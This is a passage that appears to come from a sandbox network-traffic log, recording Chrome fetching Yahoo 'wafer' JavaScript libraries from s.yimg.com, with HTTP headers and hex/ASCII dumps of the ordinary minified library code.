                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC315INData Raw: 73 6c 61 74 65 59 28 22 2b 72 2b 22 29 22 29 7d 29 29 2c 75 28 29 29 7d 76 61 72 20 66 3d 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 73 63 72 6f 6c 6c 2d 74 6f 2d 73 68 6f 77 22 29 3b 63 6f 6e 73 74 20 6d 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 63 72 6f 6c 6c 2d 74 68 72 65 73 68 6f 6c 64 22 29 7c 7c 31 38 30 30 3b 69 66 28 66 26 26 77 69 6e 64 6f 77 2e 77 61 66 65 72 29 7b 63 6f 6e 73 74 20 77 3d 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 75 74 69 6c 73 2e 74 68 72 6f 74 74 6c 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 73 63 72 6f 6c 6c 59 3e 3d 6d 26 26 28 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 56 28 68 29 22 29 2c 77 69 6e 64 6f 77 2e 77 61 66 65 72 2e 72 65 6d 6f 76 65 4c 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: slateY("+r+")")})),u())}var f=e.classList.contains("scroll-to-show");const m=e.getAttribute("data-scroll-threshold")||1800;if(f&&window.wafer){const w=window.wafer.utils.throttle((function(t){t.scrollY>=m&&(e.classList.remove("V(h)"),window.wafer.removeLi


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              94192.168.2.45111587.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC365OUTGET /aaq/wf/wf-caas-1.36.6-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC744INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: Ifcblf2F1eKA5B09rzLK1w2ajp6KY6GakSLJqNShv3grItNeIwYn2qlK+/yQ/sjeX4FRVnAI3ko=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: MQPQEJWN27S1V6V1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Sat, 05 Oct 2024 14:53:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 24 Jun 2024 16:46:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "6441e6cd44203711a611cd3db3c116b9"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: .aqk3FVBnJFz4qFL0k2URpC7m_x5fmjo
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 29171
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 274813
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 63 61 61 73 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 63 61 61 73 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d 2c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-caas",[],t):"object"==typeof exports?exports["wafer-caas"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 70 2c 63 3d 6e 2e 70 61 72 74 6e 65 72 44 61 74 61 3b 69 66 28 21 63 7c 7c 21 6f 29 72 65 74 75 72 6e 20 72 26 26 72 28 69 29 2c 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 3b 61 26 26 28 65 2e 64 61 74 61 2e 70 61 72 74 6e 65 72 44 61 74 61 2e 67 72 6f 75 70 4e 61 6d 65 3d 61 29 3b 76 61 72 20 6c 3d 63 2e 75 75 69 64 2c 64 3d 7b 61 73 73 65 74 73 3a 74 2c 69 74 65 6d 73 3a 5b 65 5d 7d 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 5f 5f 77 61 66 65 72 43 61 61 73 43 6f 6c 6c 65 63 74 69 6f 6e 2e 73 65 74 28 6c 2c 64 29 2c 65 7d 29 29 7d 2c 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: p,c=n.partnerData;if(!c||!o)return r&&r(i),Promise.resolve();a&&(e.data.partnerData.groupName=a);var l=c.uuid,d={assets:t,items:[e]};return window.__waferCaasCollection.set(l,d),e}))},y=function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 61 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 72 29 26 26 28 65 5b 72 5d 3d 61 5b 72 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 43 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 5b 5d 2c 72 3d 21 30 2c 69 3d 21 31 2c 73 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 6e 2c 6f 3d 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 72 3d 28 6e 3d 6f 2e 6e 65 78 74 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: function(e){for(var t=1;t<arguments.length;t++){var a=arguments[t];for(var r in a)Object.prototype.hasOwnProperty.call(a,r)&&(e[r]=a[r])}return e},C=function(){function e(e,t){var a=[],r=!0,i=!1,s=void 0;try{for(var n,o=e[Symbol.iterator]();!(r=(n=o.next(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 65 74 55 72 6c 50 61 72 61 6d 65 74 65 72 56 61 6c 75 65 42 79 4e 61 6d 65 2c 44 3d 52 2e 67 65 74 57 61 66 65 72 46 6f 72 54 79 70 65 2c 46 3d 52 2e 67 65 74 57 61 66 65 72 49 6e 73 74 61 6e 63 65 46 6f 72 45 6c 65 6d 2c 7a 3d 52 2e 73 65 74 54 69 6d 65 6f 75 74 2c 48 3d 5b 22 63 61 61 73 2d 63 6f 6c 6c 61 70 73 65 64 22 2c 22 63 61 61 73 2d 75 72 6c 22 2c 22 63 61 61 73 2d 75 75 69 64 22 5d 2c 59 3d 7b 7d 2c 55 3d 7b 7d 2c 47 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 2c 73 3d 61 2e 63 61 61 73 43 6f 6e 66 69 67 2c 6e 3d 61 2e 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: etUrlParameterValueByName,D=R.getWaferForType,F=R.getWaferInstanceForElem,z=R.setTimeout,H=["caas-collapsed","caas-url","caas-uuid"],Y={},U={},G=function(e){function t(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},s=a.caasConfig,n=a.e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 6c 2c 7b 22 63 61 61 73 2d 63 6f 6c 6c 61 70 73 65 64 22 3a 6e 75 6c 6c 3d 3d 3d 66 7c 7c 76 6f 69 64 20 30 3d 3d 3d 66 3f 30 3a 4e 75 6d 62 65 72 28 66 29 2c 22 63 61 61 73 2d 75 72 6c 22 3a 75 2c 22 63 61 61 73 2d 75 75 69 64 22 3a 68 2c 63 61 63 68 65 3a 6e 75 6c 6c 3d 3d 3d 64 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 3f 31 3a 4e 75 6d 62 65 72 28 64 29 2c 63 61 61 73 43 6f 6e 66 69 67 3a 73 2c 63 61 63 68 65 53 74 72 61 74 65 67 79 3a 76 2c 63 61 63 68 65 54 74 6c 3a 6e 75 6c 6c 3d 3d 3d 70 7c 7c 76 6f 69 64 20 30 3d 3d 3d 70 3f 33 30 30 3a 4e 75 6d 62 65 72 28 70 29 2c 64 65 70 65 6e 64 65 6e 63 79 45 6c 65 6d 3a 50 2c 69 73 50 72 65 66 65 74 63 68 3a 6e 75 6c 6c 3d 3d 3d 6d 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6d 3f 30 3a 4e 75 6d 62 65 72 28 6d 29 2c 74 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: l,{"caas-collapsed":null===f||void 0===f?0:Number(f),"caas-url":u,"caas-uuid":h,cache:null===d||void 0===d?1:Number(d),caasConfig:s,cacheStrategy:v,cacheTtl:null===p||void 0===p?300:Number(p),dependencyElem:P,isPrefetch:null===m||void 0===m?0:Number(m),ta
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 20 69 73 20 6d 69 73 73 69 6e 67 22 29 29 3b 76 61 72 20 72 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 69 3d 72 2e 64 65 70 65 6e 64 65 6e 63 79 45 6c 65 6d 2c 73 3d 72 2e 73 75 63 63 65 73 73 43 6c 61 73 73 3b 69 66 28 69 26 26 21 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 73 29 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 6a 65 63 74 28 6e 65 77 20 45 72 72 6f 72 28 22 64 65 70 65 6e 64 65 6e 63 79 20 6e 6f 74 20 79 65 74 20 63 6f 6d 70 6c 65 74 65 22 29 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 65 6c 65 6d 3b 69 66 28 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 73 29 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 21 30 29 3b 76 61 72 20 6f 3d 74 68 69 73 2e 5f 75 74 69 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: is missing"));var r=this._util,i=r.dependencyElem,s=r.successClass;if(i&&!i.classList.contains(s))return Promise.reject(new Error("dependency not yet complete"));var n=this._util.elem;if(n.classList.contains(s))return Promise.resolve(!0);var o=this._util
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 73 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 28 74 29 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 28 65 29 7d 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 61 73 73 65 74 73 3b 69 66 28 21 74 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 65 3b 69 66 28 22 73 69 64 65 6b 69 63 6b 22 21 3d 3d 77 26 26 77 69 6e 64 6f 77 2e 43 41 41 53 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 61 3d 65 2e 73 74 79 6c 65 2c 72 3d 59 5b 77 5d 3b 72 65 74 75 72 6e 20 72 3f 72 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 3a 28 59 5b 77 5d 3d 79 28 74 2c 61 2c 77 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2c 59 5b 77 5d 29 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: s).then(function(t){e(t)}).catch(function(e){r(e)})}).then(function(e){var t=e.assets;if(!t.length)return e;if("sidekick"!==w&&window.CAAS)return e;var a=e.style,r=Y[w];return r?r.then(function(){return e}):(Y[w]=y(t,a,w).then(function(){return e}),Y[w])}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 56 3d 6a 28 76 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 63 61 61 73 2d 62 6f 64 79 2d 77 72 61 70 70 65 72 22 29 29 5b 30 5d 3b 56 26 26 56 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 63 61 61 73 2d 62 6f 64 79 2d 63 6f 6c 6c 61 70 73 65 64 22 29 7d 69 66 28 6f 26 26 6f 2e 63 61 6c 6c 28 65 2c 6e 2c 72 29 2c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 77 61 66 65 72 2d 63 61 61 73 2d 74 72 69 67 67 65 72 2d 69 6e 70 72 6f 67 72 65 73 73 22 29 2c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 73 29 2c 53 2e 65 6d 69 74 4c 6f 67 28 7b 6e 61 6d 65 3a 22 57 61 66 65 72 43 61 61 73 22 2c 65 6c 65 6d 3a 6e 2c 6d 65 74 61 3a 7b 64 75 72 61 74 69 6f 6e 3a 6c 2c 73 6f 75 72 63 65 3a 67 3f 22 4d 45 4d 4f 52 59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: V=j(v.getElementsByClassName("caas-body-wrapper"))[0];V&&V.classList.add("caas-body-collapsed")}if(o&&o.call(e,n,r),n.classList.remove("wafer-caas-trigger-inprogress"),n.classList.add(s),S.emitLog({name:"WaferCaas",elem:n,meta:{duration:l,source:g?"MEMORY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 70 73 65 64 22 5d 29 7b 76 61 72 20 6e 3d 6a 28 73 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 63 61 61 73 2d 62 6f 64 79 2d 77 72 61 70 70 65 72 22 29 29 5b 30 5d 3b 6e 26 26 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 63 61 61 73 2d 62 6f 64 79 2d 63 6f 6c 6c 61 70 73 65 64 22 29 7d 72 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 69 29 2c 53 2e 65 6d 69 74 4c 6f 67 28 7b 6e 61 6d 65 3a 22 57 61 66 65 72 43 61 61 73 22 2c 65 6c 65 6d 3a 72 2c 6d 65 74 61 3a 7b 7d 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 53 70 61 63 69 6e 67 41 6e 64 47 65 74 4f 66 66 73 65 74 41 62 6f 76 65 52 69 67 68 74 52 61 69 6c 41 64 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: psed"]){var n=j(s.getElementsByClassName("caas-body-wrapper"))[0];n&&n.classList.add("caas-body-collapsed")}r.classList.add(i),S.emitLog({name:"WaferCaas",elem:r,meta:{}})}},{key:"handleSpacingAndGetOffsetAboveRightRailAds",value:function(e){var t=this._u


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              95192.168.2.45111887.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC367OUTGET /aaq/wf/wf-toggle-1.15.4-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC764INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: Vfesq1ZWJ8x4NJ9zzbV5JAODLBps1TLKO3odPRUpyh5PdXJF9zUZaxX3cWUMckg16y9E2u/alra69qHvHvO3vSoZZsBY8SEK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 4YC6S5N3CEZVDV00
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Mon, 30 Sep 2024 21:48:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 20 Apr 2022 09:12:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "9ec69a2055c595f415eade096a476b0d"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: HE26GDjTNsmXBUPJeKnrarkIBLKe8tee
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 12433
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 681926
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 74 6f 67 67 6c 65 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 74 6f 67 67 6c 65 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-toggle",[],t):"object"==typeof exports?exports["wafer-toggle"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:40 UTC1300INData Raw: 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 72 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 72 2c 6e 29 26 26 28 65 5b 6e 5d 3d 72 5b 6e 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 6e 3d 74 5b 72 5d 3b 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 6e 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 6e 26 26 28 6e 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e
